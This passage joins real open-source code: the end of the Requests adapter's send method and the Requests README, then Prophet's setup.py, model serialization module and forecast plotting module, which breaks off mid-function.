request.url, verify, cert) url = self.request_url(request, proxies) self.add_headers( request, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies, ) chunked = not (request.body is None or "Content-Length" in request.headers) if isinstance(timeout, tuple): try: connect, read = timeout timeout = TimeoutSauce(connect=connect, read=read) except ValueError: raise ValueError( f"Invalid timeout {timeout}. Pass a (connect, read) timeout tuple, " f"or a single float to set both timeouts to the same value." ) elif isinstance(timeout, TimeoutSauce): pass else: timeout = TimeoutSauce(connect=timeout, read=timeout) try: resp = conn.urlopen( method=request.method, url=url, body=request.body, headers=request.headers, redirect=False, assert_same_host=False, preload_content=False, decode_content=False, retries=self.max_retries, timeout=timeout, chunked=chunked, ) except (ProtocolError, OSError) as err: raise ConnectionError(err, request=request) except MaxRetryError as e: if isinstance(e.reason, ConnectTimeoutError): # TODO: Remove this in 3.0.0: see #2811 if not isinstance(e.reason, NewConnectionError): raise ConnectTimeout(e, request=request) if isinstance(e.reason, ResponseError): raise RetryError(e, request=request) if isinstance(e.reason, _ProxyError): raise ProxyError(e, request=request) if isinstance(e.reason, _SSLError): # This branch is for urllib3 v1.22 and later. raise SSLError(e, request=request) raise ConnectionError(e, request=request) except ClosedPoolError as e: raise ConnectionError(e, request=request) except _ProxyError as e: raise ProxyError(e) except (_SSLError, _HTTPError) as e: if isinstance(e, _SSLError): # This branch is for urllib3 versions earlier than v1.22 raise SSLError(e, request=request) elif isinstance(e, ReadTimeoutError): raise ReadTimeout(e, request=request) elif isinstance(e, _InvalidHeader): raise InvalidHeader(e, request=request) else: raise return self.build_response(request, resp)
# Requests **Requests** is a simple, yet elegant, HTTP library. ```python >>> import requests >>> r = requests.get('https://httpbin.org/basic-auth/user/pass', auth=('user', 'pass')) >>> r.status_code 200 >>> r.headers['content-type'] 'application/json; charset=utf8' >>> r.encoding 'utf-8' >>> r.text '{"authenticated": true, ...' >>> r.json() {'authenticated': True, ...} ``` Requests allows you to send HTTP/1.1 requests extremely easily. There’s no need to manually add query strings to your URLs, or to form-encode your `PUT` & `POST` data — but nowadays, just use the `json` method! Requests is one of the most downloaded Python packages today, pulling in around `30M downloads / week`— according to GitHub, Requests is currently [depended upon](https://github.com/psf/requests/network/dependents?package_id=UGFja2FnZS01NzA4OTExNg%3D%3D) by `1,000,000+` repositories. You may certainly put your trust in this code. [![Downloads](https://static.pepy.tech/badge/requests/month)](https://pepy.tech/project/requests) [![Supported Versions](https://img.shields.io/pypi/pyversions/requests.svg)](https://pypi.org/project/requests) [![Contributors](https://img.shields.io/github/contributors/psf/requests.svg)](https://github.com/psf/requests/graphs/contributors) ## Installing Requests and Supported Versions Requests is available on PyPI: ```console $ python -m pip install requests ``` Requests officially supports Python 3.8+. ## Supported Features & Best–Practices Requests is ready for the demands of building robust and reliable HTTP–speaking applications, for the needs of today. - Keep-Alive & Connection Pooling - International Domains and URLs - Sessions with Cookie Persistence - Browser-style TLS/SSL Verification - Basic & Digest Authentication - Familiar `dict`–like Cookies - Automatic Content Decompression and Decoding - Multi-part File Uploads - SOCKS Proxy Support - Connection Timeouts - Streaming Downloads - Automatic honoring of `.netrc` - Chunked HTTP Requests ## API Reference and User Guide available on [Read the Docs](https://requests.readthedocs.io) [![Read the Docs](https://raw.githubusercontent.com/psf/requests/main/ext/ss.png)](https://requests.readthedocs.io) ## Cloning the repository When cloning the Requests repository, you may need to add the `-c fetch.fsck.badTimezone=ignore` flag to avoid an error about a bad commit (see [this issue](https://github.com/psf/requests/issues/2690) for more background): ```shell git clone -c fetch.fsck.badTimezone=ignore https://github.com/psf/requests.git ``` You can also apply this setting to your global Git config: ```shell git config --global fetch.fsck.badTimezone ignore ``` --- [![Kenneth Reitz](https://raw.githubusercontent.com/psf/requests/main/ext/kr.png)](https://kennethreitz.org) [![Python Software Foundation](https://raw.githubusercontent.com/psf/requests/main/ext/psf.png)](https://www.python.org/psf)
prophet
36421b70f077cc657f143161de5a97f5a214e18b
File: python/setup.py # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import os import platform from pathlib import Path from shutil import copy, copytree, rmtree from typing import List import tempfile from setuptools import find_packages, setup, Extension from setuptools.command.build_ext import build_ext from setuptools.command.build_py import build_py from setuptools.command.editable_wheel import editable_wheel from wheel.bdist_wheel import bdist_wheel MODEL_DIR = "stan" MODEL_TARGET_DIR = os.path.join("prophet", "stan_model") CMDSTAN_VERSION = "2.33.1" BINARIES_DIR = "bin" BINARIES = ["diagnose", "print", "stanc", "stansummary"] TBB_PARENT = "stan/lib/stan_math/lib" TBB_DIRS = ["tbb", "tbb_2020.3"] IS_WINDOWS = platform.platform().startswith("Win") def prune_cmdstan(cmdstan_dir: str) -> None: """ Keep only the cmdstan executables and tbb files (minimum required to run a cmdstanpy commands on a pre-compiled model). """ original_dir = Path(cmdstan_dir).resolve() parent_dir = original_dir.parent temp_dir = parent_dir / "temp" if temp_dir.is_dir(): rmtree(temp_dir) temp_dir.mkdir() print("Copying ", original_dir, " to ", temp_dir, " for pruning") copytree(original_dir / BINARIES_DIR, temp_dir / BINARIES_DIR) for f in (temp_dir / BINARIES_DIR).iterdir(): if f.is_dir(): rmtree(f) elif f.is_file() and f.stem not in BINARIES: os.remove(f) for tbb_dir in TBB_DIRS: copytree(original_dir / TBB_PARENT / tbb_dir, temp_dir / TBB_PARENT / tbb_dir) rmtree(original_dir) temp_dir.rename(original_dir) def repackage_cmdstan(): return os.environ.get("PROPHET_REPACKAGE_CMDSTAN", "").lower() not in ["false", "0"] def maybe_install_cmdstan_toolchain() -> bool: """Install C++ compilers required to build stan models on Windows machines.""" import cmdstanpy try: cmdstanpy.utils.cxx_toolchain_path() return False except Exception: try: from cmdstanpy.install_cxx_toolchain import run_rtools_install except ImportError: # older versions from cmdstanpy.install_cxx_toolchain import main as run_rtools_install run_rtools_install({"version": None, "dir": None, "verbose": True}) cmdstanpy.utils.cxx_toolchain_path() return True def install_cmdstan_deps(cmdstan_dir: Path): import cmdstanpy from multiprocessing import cpu_count if repackage_cmdstan(): if IS_WINDOWS: maybe_install_cmdstan_toolchain() print("Installing cmdstan to", cmdstan_dir) if os.path.isdir(cmdstan_dir): rmtree(cmdstan_dir) if not cmdstanpy.install_cmdstan( version=CMDSTAN_VERSION, dir=cmdstan_dir.parent, overwrite=True, verbose=True, cores=cpu_count(), progress=True, ): raise RuntimeError("CmdStan failed to install in repackaged directory") def build_cmdstan_model(target_dir): """ Rebuild cmdstan in the build environment, then use this installation to compile the stan model. The stan model is copied to {target_dir}/prophet_model.bin The cmdstan files required to run cmdstanpy commands are copied to {target_dir}/cmdstan-{version}. Parameters ---------- target_dir: Directory to copy the compiled model executable and core cmdstan files to. """ import cmdstanpy target_cmdstan_dir = (Path(target_dir) / f"cmdstan-{CMDSTAN_VERSION}").resolve() with tempfile.TemporaryDirectory() as tmp_dir: # long paths on windows can cause problems during build if IS_WINDOWS: cmdstan_dir = (Path(tmp_dir) / f"cmdstan-{CMDSTAN_VERSION}").resolve() else: cmdstan_dir = target_cmdstan_dir install_cmdstan_deps(cmdstan_dir) model_name = "prophet.stan" # note: ensure copy target is a directory not a file. temp_stan_file = copy(os.path.join(MODEL_DIR, model_name), cmdstan_dir.parent.resolve()) sm = cmdstanpy.CmdStanModel(stan_file=temp_stan_file) target_name = "prophet_model.bin" copy(sm.exe_file, os.path.join(target_dir, target_name)) if IS_WINDOWS and repackage_cmdstan(): copytree(cmdstan_dir, target_cmdstan_dir) # Clean up for f in Path(MODEL_DIR).iterdir(): if f.is_file() and f.name != model_name: os.remove(f) if repackage_cmdstan(): prune_cmdstan(target_cmdstan_dir) def get_backends_from_env() -> List[str]: return os.environ.get("STAN_BACKEND", "CMDSTANPY").split(",") def build_models(target_dir): print("Compiling cmdstanpy model") build_cmdstan_model(target_dir) if "PYSTAN" in get_backends_from_env(): raise ValueError("PyStan backend is not supported for Prophet >= 1.1") class BuildPyCommand(build_py): """Custom build command to pre-compile Stan models.""" def run(self): if not self.dry_run: target_dir = os.path.join(self.build_lib, MODEL_TARGET_DIR) self.mkpath(target_dir) build_models(target_dir) build_py.run(self) class BuildExtCommand(build_ext): """Ensure built extensions are added to the correct path in the wheel.""" def run(self): pass class EditableWheel(editable_wheel): """Custom develop command to pre-compile Stan models in-place.""" def run(self): if not self.dry_run: target_dir = os.path.join(self.project_dir, MODEL_TARGET_DIR) self.mkpath(target_dir) build_models(target_dir) editable_wheel.run(self) class BDistWheelABINone(bdist_wheel): def finalize_options(self): bdist_wheel.finalize_options(self) self.root_is_pure = False def get_tag(self): _, _, plat = bdist_wheel.get_tag(self) return "py3", "none", plat about = {} here = Path(__file__).parent.resolve() with open(here / "prophet" / "__version__.py", "r") as f: exec(f.read(), about) setup( version=about["__version__"], packages=find_packages(), zip_safe=False, include_package_data=True, ext_modules=[Extension("prophet.stan_model", [])], cmdclass={ "build_ext": BuildExtCommand, "build_py": BuildPyCommand, "editable_wheel": EditableWheel, "bdist_wheel": BDistWheelABINone, }, test_suite="prophet.tests", ) File: python/prophet/serialize.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function from collections import OrderedDict from copy import deepcopy from io import StringIO import json from pathlib import Path import numpy as np import pandas as pd from prophet.forecaster import Prophet about = {} here = Path(__file__).parent.resolve() with open(here / "__version__.py", "r") as f: exec(f.read(), about) SIMPLE_ATTRIBUTES = [ 'growth', 'n_changepoints', 'specified_changepoints', 'changepoint_range', 'yearly_seasonality', 'weekly_seasonality', 'daily_seasonality', 'seasonality_mode', 'seasonality_prior_scale', 'changepoint_prior_scale', 'holidays_prior_scale', 'mcmc_samples', 'interval_width', 'uncertainty_samples', 'y_scale', 'y_min', 'scaling', 'logistic_floor', 'country_holidays', 'component_modes', 'holidays_mode' ] PD_SERIES = ['changepoints', 'history_dates', 'train_holiday_names'] PD_TIMESTAMP = ['start'] PD_TIMEDELTA = ['t_scale'] PD_DATAFRAME = ['holidays', 'history', 'train_component_cols'] NP_ARRAY = ['changepoints_t'] ORDEREDDICT = ['seasonalities', 'extra_regressors'] def model_to_dict(model): """Convert a Prophet model to a dictionary suitable for JSON serialization. Model must be fitted. Skips Stan objects that are not needed for predict. Can be reversed with model_from_dict. Parameters ---------- model: Prophet model object. Returns ------- dict that can be used to serialize a Prophet model as JSON or loaded back into a Prophet model. """ if model.history is None: raise ValueError( "This can only be used to serialize models that have already been fit." ) model_dict = { attribute: getattr(model, attribute) for attribute in SIMPLE_ATTRIBUTES } # Handle attributes of non-core types for attribute in PD_SERIES: if getattr(model, attribute) is None: model_dict[attribute] = None else: model_dict[attribute] = getattr(model, attribute).to_json( orient='split', date_format='iso' ) for attribute in PD_TIMESTAMP: model_dict[attribute] = getattr(model, attribute).timestamp() for attribute in PD_TIMEDELTA: model_dict[attribute] = getattr(model, attribute).total_seconds() for attribute in PD_DATAFRAME: if getattr(model, attribute) is None: model_dict[attribute] = None else: model_dict[attribute] = getattr(model, attribute).to_json(orient='table', index=False) for attribute in NP_ARRAY: model_dict[attribute] = getattr(model, attribute).tolist() for attribute in ORDEREDDICT: model_dict[attribute] = [ list(getattr(model, attribute).keys()), getattr(model, attribute), ] # Other attributes with special handling # fit_kwargs -> Transform any numpy types before serializing. # They do not need to be transformed back on deserializing. fit_kwargs = deepcopy(model.fit_kwargs) if 'init' in fit_kwargs: for k, v in fit_kwargs['init'].items(): if isinstance(v, np.ndarray): fit_kwargs['init'][k] = v.tolist() elif isinstance(v, np.floating): fit_kwargs['init'][k] = float(v) model_dict['fit_kwargs'] = fit_kwargs # Params (Dict[str, np.ndarray]) model_dict['params'] = {k: v.tolist() for k, v in model.params.items()} # Attributes that are skipped: stan_fit, stan_backend model_dict['__prophet_version'] = about["__version__"] return model_dict def model_to_json(model): """Serialize a Prophet model to json string. Model must be fitted. Skips Stan objects that are not needed for predict. Can be deserialized with model_from_json. Parameters ---------- model: Prophet model object. Returns ------- json string that can be deserialized into a Prophet model. """ model_json = model_to_dict(model) return json.dumps(model_json) def _handle_simple_attributes_backwards_compat(model_dict): """Handle backwards compatibility for SIMPLE_ATTRIBUTES.""" # prophet<1.1.5: handle scaling parameters introduced in #2470 if 'scaling' not in model_dict: model_dict['scaling'] = 'absmax' model_dict['y_min'] = 0. # prophet<1.1.5: handle holidays_mode parameter introduced in #2477 if 'holidays_mode' not in model_dict: model_dict['holidays_mode'] = model_dict['seasonality_mode'] def model_from_dict(model_dict): """Recreate a Prophet model from a dictionary. Recreates models that were converted with model_to_dict. Parameters ---------- model_dict: Dictionary containing model, created with model_to_dict. Returns ------- Prophet model. """ model = Prophet() # We will overwrite all attributes set in init anyway # Simple types _handle_simple_attributes_backwards_compat(model_dict) for attribute in SIMPLE_ATTRIBUTES: setattr(model, attribute, model_dict[attribute]) for attribute in PD_SERIES: if model_dict[attribute] is None: setattr(model, attribute, None) else: s = pd.read_json(StringIO(model_dict[attribute]), typ='series', orient='split') if s.name == 'ds': if len(s) == 0: s = pd.to_datetime(s) s = s.dt.tz_localize(None) setattr(model, attribute, s) for attribute in PD_TIMESTAMP: setattr(model, attribute, pd.Timestamp.utcfromtimestamp(model_dict[attribute]).tz_localize(None)) for attribute in PD_TIMEDELTA: setattr(model, attribute, pd.Timedelta(seconds=model_dict[attribute])) for attribute in PD_DATAFRAME: if model_dict[attribute] is None: setattr(model, attribute, None) else: df = pd.read_json(StringIO(model_dict[attribute]), typ='frame', orient='table', convert_dates=['ds']) if attribute == 'train_component_cols': # Special handling because of named index column df.columns.name = 'component' df.index.name = 'col' setattr(model, attribute, df) for attribute in NP_ARRAY: setattr(model, attribute, np.array(model_dict[attribute])) for attribute in ORDEREDDICT: key_list, unordered_dict = model_dict[attribute] od = OrderedDict() for key in key_list: od[key] = unordered_dict[key] setattr(model, attribute, od) # Other attributes with special handling # fit_kwargs model.fit_kwargs = model_dict['fit_kwargs'] # Params (Dict[str, np.ndarray]) model.params = {k: np.array(v) for k, v in model_dict['params'].items()} # Skipped attributes model.stan_backend = None model.stan_fit = None return model def model_from_json(model_json): """Deserialize a Prophet model from json string. Deserializes models that were serialized with model_to_json. Parameters ---------- model_json: Serialized model string Returns ------- Prophet model. """ model_dict = json.loads(model_json) return model_from_dict(model_dict) File: python/prophet/plot.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import logging import numpy as np import pandas as pd from prophet.diagnostics import performance_metrics logger = logging.getLogger('prophet.plot') try: from matplotlib import pyplot as plt from matplotlib.dates import ( MonthLocator, num2date, AutoDateLocator, AutoDateFormatter, ) from matplotlib.ticker import FuncFormatter from pandas.plotting import deregister_matplotlib_converters deregister_matplotlib_converters() except ImportError: logger.error('Importing matplotlib failed. Plotting will not work.') try: import plotly.graph_objs as go from plotly.subplots import make_subplots except ImportError: logger.error('Importing plotly failed. Interactive plots will not work.') def plot( m, fcst, ax=None, uncertainty=True, plot_cap=True, xlabel='ds', ylabel='y', figsize=(10, 6), include_legend=False ): """Plot the Prophet forecast. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. ax: Optional matplotlib axes on which to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. xlabel: Optional label name on X-axis ylabel: Optional label name on Y-axis figsize: Optional tuple width, height in inches. include_legend: Optional boolean to add legend to the plot. Returns ------- A matplotlib figure. """ user_provided_ax = False if ax is None else True if ax is None: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) else: fig = ax.get_figure() fcst_t = fcst['ds'] ax.plot(m.history['ds'], m.history['y'], 'k.', label='Observed data points') ax.plot(fcst_t, fcst['yhat'], ls='-', c='#0072B2', label='Forecast') if 'cap' in fcst and plot_cap: ax.plot(fcst_t, fcst['cap'], ls='--', c='k', label='Maximum capacity') if m.logistic_floor and 'floor' in fcst and plot_cap: ax.plot(fcst_t, fcst['floor'], ls='--', c='k', label='Minimum capacity') if uncertainty and m.uncertainty_samples: ax.fill_between(fcst_t, fcst['yhat_lower'], fcst['yhat_upper'], color='#0072B2', alpha=0.2, label='Uncertainty interval') # Specify formatting to workaround matplotlib issue #12925 locator = AutoDateLocator(interval_multiples=False) formatter = AutoDateFormatter(locator) ax.xaxis.set_major_locator(locator) ax.xaxis.set_major_formatter(formatter) ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) ax.set_xlabel(xlabel) ax.set_ylabel(ylabel) if include_legend: ax.legend() if not user_provided_ax: fig.tight_layout() return fig def plot_components( m, fcst, uncertainty=True, plot_cap=True, weekly_start=0, yearly_start=0, figsize=None ): """Plot the Prophet forecast components. Will plot whichever are available of: trend, holidays, weekly seasonality, yearly seasonality, and additive and multiplicative extra regressors. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. weekly_start: Optional int specifying the start day of the weekly seasonality plot. 0 (default) starts the week on Sunday. 1 shifts by 1 day to Monday, and so on. yearly_start: Optional int specifying the start day of the yearly seasonality plot. 0 (default) starts the year on Jan 1. 1 shifts by 1 day to Jan 2, and so on. figsize: Optional tuple width, height in inches. Returns ------- A matplotlib figure. """ # Identify components to be plotted components = ['trend'] if m.train_holiday_names is not None and 'holidays' in fcst: components.append('holidays') # Plot weekly seasonality, if present if 'weekly' in m.seasonalities and 'weekly' in fcst: components.append('weekly') # Yearly if present if 'yearly' in m.seasonalities and 'yearly' in fcst: components.append('yearly') # Other seasonalities components.extend([ name for name in sorted(m.seasonalities) if name in fcst and name not in ['weekly', 'yearly'] ]) regressors = {'additive': False, 'multiplicative': False} for name, props in m.extra_regressors.items(): regressors[props['mode']] = True for mode in ['additive', 'multiplicative']: if regressors[mode] and 'extra_regressors_{}'.format(mode) in fcst: components.append('extra_regressors_{}'.format(mode)) npanel = len(components) figsize = figsize if figsize else (9, 3 * npanel) fig, axes = plt.subplots(npanel, 1, facecolor='w', figsize=figsize) if npanel == 1: axes = [axes] multiplicative_axes = [] dt = m.history['ds'].diff() min_dt = dt.iloc[dt.values.nonzero()[0]].min() for ax, plot_name in zip(axes, components): if plot_name == 'trend': plot_forecast_component( m=m, fcst=fcst, name='trend', ax=ax, uncertainty=uncertainty, plot_cap=plot_cap, ) elif plot_name in m.seasonalities: if ( (plot_name == 'weekly' or m.seasonalities[plot_name]['period'] == 7) and (min_dt == pd.Timedelta(days=1)) ): plot_weekly( m=m, name=plot_name, ax=ax, uncertainty=uncertainty, weekly_start=weekly_start ) elif plot_name == 'yearly' or m.seasonalities[plot_name]['period'] == 365.25: plot_yearly( m=m, name=plot_name, ax=ax, uncertainty=uncertainty, yearly_start=yearly_start ) else: plot_seasonality( m=m, name=plot_name, ax=ax, uncertainty=uncertainty, ) elif plot_name in [ 'holidays', 'extra_regressors_additive', 'extra_regressors_multiplicative', ]: plot_forecast_component( m=m, fcst=fcst, name=plot_name, ax=ax, uncertainty=uncertainty, plot_cap=False, ) if plot_name in m.component_modes['multiplicative']: multiplicative_axes.append(ax) fig.tight_layout() # Reset multiplicative axes labels after tight_layout adjustment for ax in multiplicative_axes: ax = set_y_as_percent(ax) return fig def plot_forecast_component( m, fcst, name, ax=None, uncertainty=True, plot_cap=False, figsize=(10, 6) ): """Plot a particular component of the forecast. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. name: Name of the component to plot. ax: Optional matplotlib Axes to plot on. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. figsize: Optional tuple width, height in inches. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) fcst_t = fcst['ds'].dt.to_pydatetime() artists += ax.plot(fcst_t, fcst[name], ls='-', c='#0072B2') if 'cap' in fcst and plot_cap: artists += ax.plot(fcst_t, fcst['cap'], ls='--', c='k') if m.logistic_floor and 'floor' in fcst and plot_cap: ax.plot(fcst_t, fcst['floor'], ls='--', c='k') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between( fcst_t, fcst[name + '_lower'], fcst[name + '_upper'], color='#0072B2', alpha=0.2)] # Specify formatting to workaround matplotlib issue #12925 locator = AutoDateLocator(interval_multiples=False) formatter = AutoDateFormatter(locator) ax.xaxis.set_major_locator(locator) ax.xaxis.set_major_formatter(formatter) ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) ax.set_xlabel('ds') ax.set_ylabel(name) if name in m.component_modes['multiplicative']: ax = set_y_as_percent(ax) return artists def seasonality_plot_df(m, ds): """Prepare dataframe for plotting seasonal components. Parameters ---------- m: Prophet model. ds: List of dates for column ds. Returns ------- A dataframe with seasonal components on ds. """ df_dict = {'ds': ds, 'cap': 1., 'floor': 0.} for name in m.extra_regressors: df_dict[name] = 0. # Activate all conditional seasonality columns for props in m.seasonalities.values(): if props['condition_name'] is not None: df_dict[props['condition_name']] = True df = pd.DataFrame(df_dict) df = m.setup_dataframe(df) return df def plot_weekly(m, ax=None, uncertainty=True, weekly_start=0, figsize=(10, 6), name='weekly'): """Plot the weekly component of the forecast. Parameters ---------- m: Prophet model. ax: Optional matplotlib Axes to plot on. One will be created if this is not provided. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. weekly_start: Optional int specifying the start day of the weekly seasonality plot. 0 (default) starts the week on Sunday. 1 shifts by 1 day to Monday, and so on. figsize: Optional tuple width, height in inches. name: Name of seasonality component if changed from default 'weekly'. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) # Compute weekly seasonality for a Sun-Sat sequence of dates. days = (pd.date_range(start='2017-01-01', periods=7) + pd.Timedelta(days=weekly_start)) df_w = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_w) days = days.day_name() artists += ax.plot(range(len(days)), seas[name], ls='-', c='#0072B2') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between(range(len(days)), seas[name + '_lower'], seas[name + '_upper'], color='#0072B2', alpha=0.2)] ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) ax.set_xticks(range(len(days))) ax.set_xticklabels(days) ax.set_xlabel('Day of week') ax.set_ylabel(name) if m.seasonalities[name]['mode'] == 'multiplicative': ax = set_y_as_percent(ax) return artists def plot_yearly(m, ax=None, uncertainty=True, yearly_start=0, figsize=(10, 6), name='yearly'): """Plot the yearly component of the forecast. Parameters ---------- m: Prophet model. ax: Optional matplotlib Axes to plot on. One will be created if this is not provided. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. yearly_start: Optional int specifying the start day of the yearly seasonality plot. 0 (default) starts the year on Jan 1. 1 shifts by 1 day to Jan 2, and so on. figsize: Optional tuple width, height in inches. name: Name of seasonality component if previously changed from default 'yearly'. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) # Compute yearly seasonality for a Jan 1 - Dec 31 sequence of dates. days = (pd.date_range(start='2017-01-01', periods=365) + pd.Timedelta(days=yearly_start)) df_y = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_y) artists += ax.plot( df_y['ds'].dt.to_pydatetime(), seas[name], ls='-', c='#0072B2') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between( df_y['ds'].dt.to_pydatetime(), seas[name + '_lower'], seas[name + '_upper'], color='#0072B2', alpha=0.2)] ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) months = MonthLocator(range(1, 13), bymonthday=1, interval=2) ax.xaxis.set_major_formatter(FuncFormatter( lambda x, pos=None: '{dt:%B} {dt.day}'.format(dt=num2date(x)))) ax.xaxis.set_major_locator(months) ax.set_xlabel('Day of year') ax.set_ylabel(name) if m.seasonalities[name]['mode'] == 'multiplicative': ax = set_y_as_percent(ax) return artists def plot_seasonality(m, name, ax=None, uncertainty=True, figsize=(10, 6)): """Plot a custom seasonal component. Parameters ---------- m: Prophet model. name: Seasonality name, like 'daily', 'weekly'. ax: Optional matplotlib Axes to plot on. One will be created if this is not provided. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. figsize: Optional tuple width, height in inches. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) # Compute seasonality from Jan 1 through a single period. start = pd.to_datetime('2017-01-01 0000') period = m.seasonalities[name]['period'] end = start + pd.Timedelta(days=period) plot_points = 200 days = pd.to_datetime(np.linspace(start.value, end.value, plot_points)) df_y = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_y) artists += ax.plot(df_y['ds'].dt.to_pydatetime(), seas[name], ls='-', c='#0072B2') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between( df_y['ds'].dt.to_pydatetime(), seas[name + '_lower'], seas[name + '_upper'], color='#0072B2', alpha=0.2)] ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) n_ticks = 8 xticks = pd.to_datetime(np.linspace(start.value, end.value, n_ticks) ).to_pydatetime() ax.set_xticks(xticks) if name == 'yearly': fmt = FuncFormatter( lambda x, pos=None: '{dt:%B} {dt.day}'.format(dt=num2date(x))) ax.set_xlabel('Day of year') elif name == 'weekly': fmt = FuncFormatter( lambda x, pos=None: '{dt:%A}'.format(dt=num2date(x))) ax.set_xlabel('Day of Week') elif name == 'daily': fmt = FuncFormatter( lambda x, pos=None: '{dt:%T}'.format(dt=num2date(x))) ax.set_xlabel('Hour of day') elif period <= 2: fmt = FuncFormatter( lambda x, pos=None: '{dt:%T}'.format(dt=num2date(x))) ax.set_xlabel('Hours') else: fmt = FuncFormatter( lambda x, pos=None: '{:.0f}'.format(pos * period / (n_ticks - 1))) ax.set_xlabel('Days') ax.xaxis.set_major_formatter(fmt) ax.set_ylabel(name) if m.seasonalities[name]['mode'] == 'multiplicative': ax = set_y_as_percent(ax) return artists def set_y_as_percent(ax): yticks = 100 * ax.get_yticks() yticklabels = ['{0:.4g}%'.format(y) for y in yticks] ax.set_yticks(ax.get_yticks().tolist()) ax.set_yticklabels(yticklabels) return ax def add_changepoints_to_plot( ax, m, fcst, threshold=0.01, cp_color='r', cp_linestyle='--', trend=True, ): """Add markers for significant changepoints to prophet forecast plot. Example: fig = m.plot(forecast) add_changepoints_to_plot(fig.gca(), m, forecast) Parameters ---------- ax: axis on which to overlay changepoint markers. m: Prophet model. fcst: Forecast output from m.predict. threshold: Threshold on trend change magnitude for significance. cp_color: Color of changepoint markers. cp_linestyle: Linestyle for changepoint markers. trend: If True, will also overlay the trend. Returns ------- a list of matplotlib artists """ artists = [] if trend: artists.append(ax.plot(fcst['ds'], fcst['trend'], c=cp_color)) signif_changepoints = m.changepoints[ np.abs(np.nanmean(m.params['delta'], axis=0)) >= threshold ] if len(m.changepoints) > 0 else [] for cp in signif_changepoints: artists.append(ax.axvline(x=cp, c=cp_color, ls=cp_linestyle)) return artists def plot_cross_validation_metric( df_cv, metric, rolling_window=0.1, ax=None, figsize=(10, 6), color='b', point_color='gray' ): """Plot a performance metric vs. forecast horizon from cross validation. Cross validation produces a collection of out-of-sample model predictions that can be compared to actual values, at a range of different horizons (distance from the cutoff). This computes a specified performance metric for each prediction, and aggregated over a rolling window with horizon. This uses prophet.diagnostics.performance_metrics to compute the metrics. Valid values of metric are 'mse', 'rmse', 'mae', 'mape', and 'coverage'. rolling_window is the proportion of data included in the rolling window of aggregation. The default value of 0.1 means 10% of data are included in the aggregation for computing the metric. As a concrete example, if metric='mse', then this plot will show the squared error for each cross validation prediction, along with the MSE averaged over rolling windows of 10% of the data. Parameters ---------- df_cv: The output from prophet.diagnostics.cross_validation. metric: Metric name, one of ['mse', 'rmse', 'mae', 'mape', 'coverage']. rolling_window: Proportion of data to use for rolling average of metric. In [0, 1]. Defaults to 0.1. ax: Optional matplotlib axis on which to plot. If not given, a new figure will be created. figsize: Optional tuple width, height in inches. color: Optional color for plot and error points, useful when plotting multiple model performances on one axis for comparison. Returns ------- a matplotlib figure. """ if ax is None: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) else: fig = ax.get_figure() # Get the metric at the level of individual predictions, and with the rolling window. df_none = performance_metrics(df_cv, metrics=[metric], rolling_window=-1) df_h = performance_metrics(df_cv, metrics=[metric], rolling_window=rolling_window) # Some work because matplotlib does not handle timedelta # Target ~10 ticks. tick_w = max(df_none['horizon'].astype('timedelta64[ns]')) / 10. # Find the largest time resolution that has <1 unit per bin. dts = ['D', 'h', 'm', 's', 'ms', 'us', 'ns'] dt_names = [ 'days', 'hours', 'minutes', 'seconds', 'milliseconds', 'microseconds', 'nanoseconds' ] dt_conversions = [ 24 * 60 * 60 * 10 ** 9, 60 * 60 * 10 ** 9, 60 * 10 ** 9, 10 ** 9, 10 ** 6, 10 ** 3, 1., ] for i, dt in enumerate(dts): if np.timedelta64(1, dt) < np.timedelta64(tick_w, 'ns'): break x_plt = df_none['horizon'].astype('timedelta64[ns]').view(np.int64) / float(dt_conversions[i]) x_plt_h = df_h['horizon'].astype('timedelta64[ns]').view(np.int64) / float(dt_conversions[i]) ax.plot(x_plt, df_none[metric], '.', alpha=0.1, c=point_color) ax.plot(x_plt_h, df_h[metric], '-', c=color) ax.grid(True) ax.set_xlabel('Horizon 